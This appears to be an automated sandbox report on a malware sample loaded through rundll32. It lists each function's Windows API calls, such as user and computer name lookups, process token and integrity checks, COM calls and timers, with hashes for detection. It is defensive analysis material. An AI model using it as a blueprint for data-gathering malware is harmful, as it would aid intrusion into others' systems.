Part of subcall function 00455B6B: lstrcpy.KERNEL32(00000000,00000000), ref: 00455BC5
Part of subcall function 00455B6B: lstrcat.KERNEL32(00000000,00000000), ref: 00455BCD

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Close$ClipboardOpen$FileHandleObjectSingleWaitmemcpy$CreateCurrentDataEnumEventMappingProcessViewlstrcatlstrcpylstrlenmemsetwsprintf
String ID:
API String ID: 1450395116-0
Opcode ID: 1db530c40ed9785ce860b4c31e79a05a1f3f44a6047accf71dc28f50698d114f
Instruction ID: 34f06e17fb21d18ba355b9a4e103c1ce9f98299991cc1f2c96e9357d234feab9
Opcode Fuzzy Hash: 1db530c40ed9785ce860b4c31e79a05a1f3f44a6047accf71dc28f50698d114f
Instruction Fuzzy Hash: 07617F71900708AFCB10EFA4DC99AAE77B9EB44346B10407AFD05E7252DB399D49CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00455568, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 0045559F
GetUserNameW.ADVAPI32(00000000,?), ref: 004555C3
HeapFree.KERNEL32(00000000,00000000), ref: 004555E4
GetComputerNameW.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,00453EE7), ref: 0045560B
GetComputerNameW.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,00453EE7), ref: 0045562C
HeapFree.KERNEL32(00000000,00000000), ref: 0045564A

Strings

>E, xrefs: 00455586

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Name$ComputerFreeHeapUser
String ID: >E
API String ID: 684815088-2739026686
Opcode ID: ff0cfeb1a4efae0a6ac34ca10cf0eb6ca13ec72c0391fae03ec63ecc1f81ac54
Instruction ID: 75a1fd3ce0af0a0ea94c072422b049cde1f6cc01371e7fbfc84bd38ddfa4f595
Opcode Fuzzy Hash: ff0cfeb1a4efae0a6ac34ca10cf0eb6ca13ec72c0391fae03ec63ecc1f81ac54
Instruction Fuzzy Hash: F8311771A00709EFDB10DFA9DCC1A6EB7F9EB48312F51446AE805D3262E734EE059B58

Uniqueness

Uniqueness Score: -1.00%

Function 004556C7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 147
servicecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(?,00000000,00000004,008B96A0,?), ref: 004556FA
ObjectStublessClient9.OLE32(?,?,?,00000008,?,00000001,?,?,00000000), ref: 00455721
IUnknown_QueryService.SHLWAPI(?,?,008B9680,FpE), ref: 00455793
IUnknown_QueryService.SHLWAPI(?,?,008B9680,FpE), ref: 004557D1
ObjectStublessClient9.OLE32(FpE,?,?,00000000,?,?,?,?,?,?,?,00457046,?), ref: 004557F0

Strings

FpE, xrefs: 004557B7, 004557E6, 0045581C, 00455779, 0045577C, 004557BA, 004557EF, 00455821

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Client9ObjectQueryServiceStublessUnknown_$CreateInstance
String ID: FpE
API String ID: 469357633-2732582025
Opcode ID: 75c8357665b651beae8e292e8afd90d32958fa9bb2a5bc8de196bb9adfea6a33
Instruction ID: 7fb0312baae2f3e0e0552e30693f260a6e235e316ce399543a4e63e4223e610c
Opcode Fuzzy Hash: 75c8357665b651beae8e292e8afd90d32958fa9bb2a5bc8de196bb9adfea6a33
Instruction Fuzzy Hash: F4515E75D00619EFCB00DFE8C898DAEB7B9FF48315B0485A9E905EB212D734A905CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0045309E, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenProcess.NTDLL(?,00000400,?,?), ref: 004530E5
NtOpenProcessToken.NTDLL(?,00000008,?), ref: 004530F8
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 00453114

Part of subcall function 00455C3C: RtlAllocateHeap.NTDLL(00000000,?,0045955B), ref: 00455C48

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?,?), ref: 00453131
memcpy.NTDLL(?,00000000,0000001C), ref: 0045313E
NtClose.NTDLL(?), ref: 00453150
NtClose.NTDLL(?), ref: 0045315A

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 9c5435d8694bfa9466fe06c193915b557e973335739823a6307bc1ba51ec4733
Instruction ID: 6ecdf50dcebe1b512c1b539b7dd225b3d135f42bcc9bee18536176460ec15eb9
Opcode Fuzzy Hash: 9c5435d8694bfa9466fe06c193915b557e973335739823a6307bc1ba51ec4733
Instruction Fuzzy Hash: 2F21F4B2900218BBDB019FA5CC45ADEBFBDEB08B96F108026F905E6161D7758B449BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00452D6B, Relevance: 3.1, APIs: 2, Instructions: 53memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00453F33: lstrlen.KERNEL32(0045B0B0,00000000,0045B0B0,?,00451990,?), ref: 00453F3C
Part of subcall function 00453F33: mbstowcs.NTDLL ref: 00453F63
Part of subcall function 00453F33: memset.NTDLL ref: 00453F75

GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000000,?), ref: 00452DAD

Part of subcall function 004574DC: SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00457504
Part of subcall function 004574DC: memcpy.NTDLL(?,?,00000008), ref: 0045751E
Part of subcall function 004574DC: SafeArrayDestroy.OLEAUT32(00000000), ref: 00457553

HeapFree.KERNEL32(00000000,00000000,?), ref: 00452DE4

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: ArraySafeTime$CreateDestroyFileFreeHeapSystemlstrlenmbstowcsmemcpymemset
String ID:
API String ID: 214104239-0
Opcode ID: d7077f2c194a5f85bd4f04fbd7556b097b8097cc617c1410bdff55aca55dae1e
Instruction ID: 7b6cc12f0c24feccfaf9588a0e9145aa5b95af9b027afeb2acd5c7d91b321b7a
Opcode Fuzzy Hash: d7077f2c194a5f85bd4f04fbd7556b097b8097cc617c1410bdff55aca55dae1e
Instruction Fuzzy Hash: 0001A132600309BFDB219FA8DC84EAA77BCFB44306F00446ABA40D7163E6B4E9198758

Uniqueness

Uniqueness Score: -1.00%

Function 00451815, Relevance: 15.2, APIs: 10, Instructions: 212
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 004518CA
RtlEnterCriticalSection.NTDLL(0045C2C4), ref: 004518EB
RtlLeaveCriticalSection.NTDLL(0045C2C4), ref: 00451909
StrTrimA.SHLWAPI(00000000,0045B280), ref: 00451940

Part of subcall function 00453F33: lstrlen.KERNEL32(0045B0B0,00000000,0045B0B0,?,00451990,?), ref: 00453F3C
Part of subcall function 00453F33: mbstowcs.NTDLL ref: 00453F63
Part of subcall function 00453F33: memset.NTDLL ref: 00453F75

wcstombs.NTDLL ref: 00451A15

Part of subcall function 00453F85: SysAllocString.OLEAUT32(?), ref: 00453FC6
Part of subcall function 00453F85: ObjectStublessClient9.OLE32(?,?), ref: 00454067
Part of subcall function 00453F85: StrStrIW.SHLWAPI(?,?), ref: 00454087

Part of subcall function 00454962: HeapFree.KERNEL32(00000000,?,00451091), ref: 0045496E

HeapFree.KERNEL32(00000000,?,?), ref: 00451A53
HeapFree.KERNEL32(00000000,00000000,?), ref: 00451A63
HeapFree.KERNEL32(00000000,?,?), ref: 00451A73
HeapFree.KERNEL32(00000000,?), ref: 00451A83
HeapFree.KERNEL32(00000000,?), ref: 00451A93

Part of subcall function 004552A2: CoCreateInstance.OLE32(?,00000000,00000004,008B92DC,00000000), ref: 004552D0

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Heap$Free$CriticalSection$AllocAllocateClient9CreateEnterInstanceLeaveObjectStringStublessTrimlstrlenmbstowcsmemsetwcstombs
String ID:
API String ID: 4053744457-0
Opcode ID: e7f5132d08a9cc13501facc08ad142a5307b028101a214ea2a077800a0299151
Instruction ID: 464543a78b4161ec35ef22254cd5eeee4df6ebbd12dd9bd4c1be56bc11b5de54
Opcode Fuzzy Hash: e7f5132d08a9cc13501facc08ad142a5307b028101a214ea2a077800a0299151
Instruction Fuzzy Hash: CE714871900308EFCB11DFA5DC88A6A7BB8EF48756F10406AF905E72A2C734DD45DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0045392D, Relevance: 12.1, APIs: 8, Instructions: 142
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0045394E
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 0045396E
SetWaitableTimer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0045398E
HeapFree.KERNEL32(00000000,?), ref: 00453A3A
CloseHandle.KERNEL32(?), ref: 00453A4A
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00453A84
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?), ref: 00453A9E
GetLastError.KERNEL32 ref: 00453ABD

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: TimerWaitable$_allmul$CloseCreateErrorFreeHandleHeapLast
String ID:
API String ID: 2635494482-0
Opcode ID: 48ac4891d184dc0e36984e4a6e298205dc43f8a17b853c71c8a095a1aaaeb49f
Instruction ID: b2a51ed030c0b65d6405baa34d48130a2b0eda7732867c431c8f88c5dac431a7
Opcode Fuzzy Hash: 48ac4891d184dc0e36984e4a6e298205dc43f8a17b853c71c8a095a1aaaeb49f
Instruction Fuzzy Hash: AB41A6B1509310AFC710DF15DC8096FBBE8EB89766F104A2FF894D11A2D774CA44CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00453D5B, Relevance: 10.6, APIs: 7, Instructions: 148
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?), ref: 00453D74
CoInitializeEx.OLE32(00000000,00000002), ref: 00453DA9
memset.NTDLL ref: 00453E56
RtlInitializeCriticalSection.NTDLL(0045C2C4), ref: 00453E67
RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00453E8C
wsprintfA.USER32 ref: 00453EBC
OleUninitialize.OLE32 ref: 00453F07

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Initialize$AllocateCriticalHandleHeapModuleSectionUninitializememsetwsprintf
String ID:
API String ID: 541510743-0
Opcode ID: 1347fdd94b1622f3127db3963cb5b5a364a12be84c2f3d3b2b738b5956f578a2
Instruction ID: 9a6173e04b217dd232a1cd34680f7b2ddf42da50baaacb0d7b3e9dc9dce09b5d
Opcode Fuzzy Hash: 1347fdd94b1622f3127db3963cb5b5a364a12be84c2f3d3b2b738b5956f578a2
Instruction Fuzzy Hash: 2D4184B2D003149FDB209FA8DCC666A77A4A744787F14017AF901EA293E779CE48879D

Uniqueness

Uniqueness Score: -1.00%

Function 00455365, Relevance: 10.6, APIs: 7, Instructions: 82
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00000000,00000000,?,00000000,0045B058), ref: 0045539E
StrStrA.SHLWAPI(00000000,?), ref: 004553AB
RtlAllocateHeap.NTDLL(00000000,?), ref: 004553D0
memcpy.NTDLL(00000000,00000000,00000000), ref: 004553E2
memcpy.NTDLL(00000000,00000000,?,00000000,00000000,00000000), ref: 004553F3
memcpy.NTDLL(00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 0045540D
HeapFree.KERNEL32(00000000,00000000), ref: 0045541E

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: memcpy$Heap$AllocateFreelstrlen
String ID:
API String ID: 1753103609-0
Opcode ID: 03752e12f9fe969de53fc040661daba0a651756d08d83d5578531f0a1441d7fe
Instruction ID: f1440ab90097e2fca6cdef68ff8e92f8abe28f4587d3a31e5530126919c519fe
Opcode Fuzzy Hash: 03752e12f9fe969de53fc040661daba0a651756d08d83d5578531f0a1441d7fe
Instruction Fuzzy Hash: A9317A76900348AFCB118FA8CC88BAFBBB9EF89746F044059FC4097352C635D958CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0045149F, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,?), ref: 004514D1
GetTokenInformation.KERNELBASE(?,00000014,00000001,00000004,?), ref: 004514F1
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,?), ref: 00451501
CloseHandle.KERNELBASE(?), ref: 00451551

Part of subcall function 00455C3C: RtlAllocateHeap.NTDLL(00000000,?,0045955B), ref: 00455C48

GetTokenInformation.KERNELBASE(?,00000019,00000000,?,?,?), ref: 00451524
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0045152C
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0045153C

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 7f0d33e82a0a255a38f54ff296dad64e503131f61b31d16f1fdc93b9427f6796
Instruction ID: 6502a3ce5c9f0613117598830233ca5baf447f158edb329d63e0bb7edb60c145
Opcode Fuzzy Hash: 7f0d33e82a0a255a38f54ff296dad64e503131f61b31d16f1fdc93b9427f6796
Instruction Fuzzy Hash: C8213C7590031CFFEB019FA5DC84EAEBBB9EB44705F1000A6F911A62A2D7758A48DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00453F85, Relevance: 9.2, APIs: 6, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 00453FC6
ObjectStublessClient9.OLE32(?,?), ref: 00454067
StrStrIW.SHLWAPI(?,?), ref: 00454087
SysFreeString.OLEAUT32(?), ref: 004540A9

Part of subcall function 00454559: SysAllocString.OLEAUT32(0045B288), ref: 004545A9

SafeArrayDestroy.OLEAUT32(?), ref: 004540FD
SysFreeString.OLEAUT32(?), ref: 0045410B

Part of subcall function 00457435: Sleep.KERNELBASE(000001F4), ref: 0045747A

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: String$AllocFree$ArrayClient9DestroyObjectSafeSleepStubless
String ID:
API String ID: 2166904396-0
Opcode ID: 531a8d21b529655d20258f72883c8407e4352ad42403fb4dc3cb1887d14ab4cf
Instruction ID: 0d1dc7c9663f8a14993f6a51d0c321a8ed7ed050756f2a841e1a44d025feb841
Opcode Fuzzy Hash: 531a8d21b529655d20258f72883c8407e4352ad42403fb4dc3cb1887d14ab4cf
Instruction Fuzzy Hash: 7A515276900249EFCB00DFE9C8848AEB7B6FFC8705B248879EA05DB251D7359D89CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00457376, Relevance: 9.1, APIs: 6, Instructions: 76
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObjectStublessClient9.OLE32(?,00000008,00000000,00000008,00000000,004540CB,00000008,00000008), ref: 0045738C
Sleep.KERNEL32(000000C8), ref: 004573A4
ObjectStublessClient9.OLE32(?,?), ref: 004573CA
lstrlenW.KERNEL32(?), ref: 004573DA
memcpy.NTDLL(00000000,?,?,?), ref: 004573FB
SysFreeString.OLEAUT32(?), ref: 0045740F

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Client9ObjectStubless$FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 2533115827-0
Opcode ID: e52fbfa0896d4d5bcdaa9c33c73dd8a62a9429234b2433f6fa451205d8b8064e
Instruction ID: 0bf685c5909a0de2d97a6fdebf4fa2534f40d1eea7c019164f2e6a58861f7022
Opcode Fuzzy Hash: e52fbfa0896d4d5bcdaa9c33c73dd8a62a9429234b2433f6fa451205d8b8064e
Instruction Fuzzy Hash: C3219075900209EFCB11DFA5D88499EBBB8FF49306B10817AED05D7312E734DA05CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00459591, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 175
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrChrA.SHLWAPI(?,0000005F), ref: 004595C8
memcpy.NTDLL(?,?,?), ref: 004595DF
lstrcpy.KERNEL32(?), ref: 004595F2

Part of subcall function 00453F33: lstrlen.KERNEL32(0045B0B0,00000000,0045B0B0,?,00451990,?), ref: 00453F3C
Part of subcall function 00453F33: mbstowcs.NTDLL ref: 00453F63
Part of subcall function 00453F33: memset.NTDLL ref: 00453F75

Part of subcall function 00455C51: SysAllocString.OLEAUT32(?), ref: 00455C6B
Part of subcall function 00455C51: SysFreeString.OLEAUT32(00000000), ref: 00455CAB

Part of subcall function 00454962: HeapFree.KERNEL32(00000000,?,00451091), ref: 0045496E

lstrcpy.KERNEL32(?,00000000), ref: 0045960F

Strings

\, xrefs: 004595F8

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: FreeStringlstrcpy$AllocHeaplstrlenmbstowcsmemcpymemset
String ID: \
API String ID: 594908551-2967466578
Opcode ID: ea7515d842ee35abd1d2c4c74ff49b11158d4c12306c91252aad532a8d43cd84
Instruction ID: 6db028b7de303a92e4157134df87afa470b0f79b2bf8e73096739fc758c09354
Opcode Fuzzy Hash: ea7515d842ee35abd1d2c4c74ff49b11158d4c12306c91252aad532a8d43cd84
Instruction Fuzzy Hash: 1D517D72114306EFCB11EF61DD80D2BB7A9EB88746F00482EF99192123E739DC1C9B1A

Uniqueness

Uniqueness Score: -1.00%

Function 004535FF, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?), ref: 00453625

Part of subcall function 00455C3C: RtlAllocateHeap.NTDLL(00000000,?,0045955B), ref: 00455C48

RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00000104), ref: 0045366C
WaitForSingleObject.KERNEL32(00000000,?), ref: 004536D9
RegCloseKey.KERNEL32(?,00000104), ref: 00453701

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: 73b2ea4c72834b23e714d0fdadbcb5b82c3bd887dffb08b06bb4726e228df07d
Instruction ID: 274a122197c39569fc55e377464671b88c55ffe197243218d413a5d354dfdd07
Opcode Fuzzy Hash: 73b2ea4c72834b23e714d0fdadbcb5b82c3bd887dffb08b06bb4726e228df07d
Instruction Fuzzy Hash: 19313E71C00219BBCF21AF95CC858EFFEB9EB54756F10406BE950B2262C2744E44DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00457016, Relevance: 4.6, APIs: 3, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004556C7: CoCreateInstance.OLE32(?,00000000,00000004,008B96A0,?), ref: 004556FA
Part of subcall function 004556C7: ObjectStublessClient9.OLE32(?,?,?,00000008,?,00000001,?,?,00000000), ref: 00455721
Part of subcall function 004556C7: IUnknown_QueryService.SHLWAPI(?,?,008B9680,FpE), ref: 00455793

SysFreeString.OLEAUT32(0045179E), ref: 004570FA
SysFreeString.OLEAUT32(?), ref: 00457108
SysFreeString.OLEAUT32(?), ref: 00457116

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: FreeString$Client9CreateInstanceObjectQueryServiceStublessUnknown_
String ID:
API String ID: 2186414076-0
Opcode ID: afa091ffad3f74059c1769b3dc2f1e490f6e67378de3520d4694d865847b382f
Instruction ID: 330eaca5e3c6d5d792d1d940cab757e68562aba5ea5ddec7d8132afc3f9c6b70
Opcode Fuzzy Hash: afa091ffad3f74059c1769b3dc2f1e490f6e67378de3520d4694d865847b382f
Instruction Fuzzy Hash: 2A314F31900A19AFCF01EFB8D88449FBBB6FF49311F144439EA04EB221D7759949CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00458BFE, Relevance: 4.6, APIs: 3, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00458C98
SysFreeString.OLEAUT32(00000000), ref: 00458CAC
SysFreeString.OLEAUT32(?), ref: 00458CBA

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: a2ffd39d13f2ccb40caec6a60d9bfeb80c3fc29f75abd0f1987db935b61e47dd
Instruction ID: b647268f3d8fccbe3c0ebafb8208095a0b99745fbab167a39004f5a50eb00e94
Opcode Fuzzy Hash: a2ffd39d13f2ccb40caec6a60d9bfeb80c3fc29f75abd0f1987db935b61e47dd
Instruction Fuzzy Hash: 1A313071901209EFCB06CF98D8C48AE7BB5FF58302B10442EF906A7252DB359945CF79

Uniqueness

Uniqueness Score: -1.00%

Function 00459475, Relevance: 4.6, APIs: 3, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,0045B058), ref: 0045949D

Part of subcall function 00451815: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 004518CA
Part of subcall function 00451815: RtlEnterCriticalSection.NTDLL(0045C2C4), ref: 004518EB
Part of subcall function 00451815: RtlLeaveCriticalSection.NTDLL(0045C2C4), ref: 00451909
Part of subcall function 00451815: StrTrimA.SHLWAPI(00000000,0045B280), ref: 00451940

RtlAllocateHeap.NTDLL(00000000,00000800,0045B058), ref: 004594CC
HeapFree.KERNEL32(00000000,?,?), ref: 00459516

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: Heap$Allocate$CriticalSection$EnterFreeLeaveTrim
String ID:
API String ID: 3593199195-0
Opcode ID: ee7f83765c68418c5caeea38b2afd55c7f5154d2f4290630654dbc4e55e918e6
Instruction ID: 604f4312d83e060ae178eaa51df3eeaa7815d9d690496d80838ce5db1415f4b4
Opcode Fuzzy Hash: ee7f83765c68418c5caeea38b2afd55c7f5154d2f4290630654dbc4e55e918e6
Instruction Fuzzy Hash: 7E214F76600309FFCB119F61DC40E9B37A9AB49757F104066FD0697252EB34DD0A8BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004574DC, Relevance: 4.6, APIs: 3, Instructions: 52COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00457504
memcpy.NTDLL(?,?,00000008), ref: 0045751E
SafeArrayDestroy.OLEAUT32(00000000), ref: 00457553

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: ArraySafe$CreateDestroymemcpy
String ID:
API String ID: 2364292842-0
Opcode ID: 694b0fdf412769fc5bb8e22be0f51714631429219860091598aa8c3a3e4acbe7
Instruction ID: f1d8609169ce4cae74d269b16ce8e9654c9cffaa2c960c3fc5df6cd3d0672c8c
Opcode Fuzzy Hash: 694b0fdf412769fc5bb8e22be0f51714631429219860091598aa8c3a3e4acbe7
Instruction Fuzzy Hash: 38115A72900209BFDB109FA8DC05AAEBBB9EF04711F004065FA04E61A2E3759A199B95

Uniqueness

Uniqueness Score: -1.00%

Function 00451790, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00457016: SysFreeString.OLEAUT32(0045179E), ref: 004570FA

memset.NTDLL ref: 004517AC

Part of subcall function 004592E6: GetProcAddress.KERNEL32(?,004517DA,00000000), ref: 00459301

GetLastError.KERNEL32 ref: 004517E8

Strings

<, xrefs: 004517C2

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: AddressErrorFreeLastProcStringmemset
String ID: <
API String ID: 1361799768-4251816714
Opcode ID: a955664f24d920e8d099669a45d831d8a69508d2553aedcffe595d1851f0346a
Instruction ID: c20c17ebecc9ecd0f620c28adf678d12f22300f7a2de8f9c7fd1f5c633dc4cc3
Opcode Fuzzy Hash: a955664f24d920e8d099669a45d831d8a69508d2553aedcffe595d1851f0346a
Instruction Fuzzy Hash: B7F0E671A00305AFDB10AFE9DCC5A9E77BCAB08745F00446AF904A6253E774D5488B59

Uniqueness

Uniqueness Score: -1.00%

Function 00457233, Relevance: 4.5, APIs: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 00457257
GetProcAddress.KERNEL32(00000000,?), ref: 00457270
IsWow64Process.KERNELBASE(0045C234,00000000), ref: 00457288

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProcProcessWow64
String ID:
API String ID: 1818662866-0
Opcode ID: 60310bd6987d2b1620a0c45f76c50cf942f70de90852189247a8a037b4833f0b
Instruction ID: 640d90f20d4f33b164f5e91815617d60adce6dc54ad53716840ebcfcb07a4bcf
Opcode Fuzzy Hash: 60310bd6987d2b1620a0c45f76c50cf942f70de90852189247a8a037b4833f0b
Instruction Fuzzy Hash: CAF03C71D15306EFDB00DBA5ED94AAB73E8EB44707F0400A9B805E7253E734EA05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00453766, Relevance: 3.1, APIs: 2, Instructions: 82comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000001,008B9360,?), ref: 00453790
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004537E5

Part of subcall function 00453AD4: CoCreateInstance.OLE32(?,00000000,00000001,008B9380,?), ref: 00453B0D

Memory Dump Source

Source File: 00000008.00000002.2603142726.00451000.00000020.00000001.sdmp, Offset: 00451000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_451000_rundll32.jbxd

Similarity

API ID: CreateInstance$BlanketProxy
String ID:
API String ID: 3291578418-0
Opcode ID: d986346370b9f830d1a2ae99e6eee3e21be726f1aadfb7a9e22392578d5f016e
Instruction ID: d4769e0822a926515f6fc6064dbabb5b49e6121805ca01a914bac6c65fa2ef64
Opcode Fuzzy Hash: d986346370b9f830d1a2ae99e6eee3e21be726f1aadfb7a9e22392578d5f016e
